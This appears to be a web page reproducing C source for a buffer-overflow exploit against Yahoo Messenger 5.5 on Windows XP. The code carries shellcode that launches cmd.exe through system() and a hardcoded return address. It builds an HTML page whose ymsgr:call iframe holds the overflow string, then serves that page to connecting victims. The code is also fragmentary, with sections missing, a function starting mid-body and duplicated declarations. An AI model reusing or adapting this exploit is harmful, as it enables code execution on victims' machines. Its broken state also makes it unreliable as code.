Remote Yahoo Messenger V5.5 Exploiter
trang này đã được đọc lần
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
* Dtors Security Research (DSR)
* Code by: Rave
* The buffer looks like this
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h> /* These are the usual header files */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */
static int port =80;
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";
/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop lol ! \
*/
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()
static int port;

if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}
int main(int argc,char *argv[])
{
FILE *fptr;
unsigned char buffer[5000];
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction
pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */
char sd[MAXDATASIZE]; /* sd will store send text */

memcpy(buffer+offset+4,shellcode,strlen(shellcode));
// here whe make the index.html
// whe open it again if some one connects to the exploiting server
// and send it over to the victim.
fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN
%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-
serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach
heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"<IFRAME SRC=%c />html>
</body>\x00\x00\x00",0x22,0x22);
fclose(fptr); // <-- closing index.html again
// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d:/ ",port);
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}
server.sin_family = AF_INET;

} else {
fprintf(stderr,"Done\n");
}
fprintf(stdout,"Sending the overflow string... ");
// reading the index.html file and sending its
// contents to the connected victim
while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';
}
send(fd2,sd,strlen(sd),0);
printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s lol\n\n\nPress any key to exit the
exploit",inet_ntoa(client.sin_addr),he->h_name);
gets(sd);
exit(0);
}
return 0;
}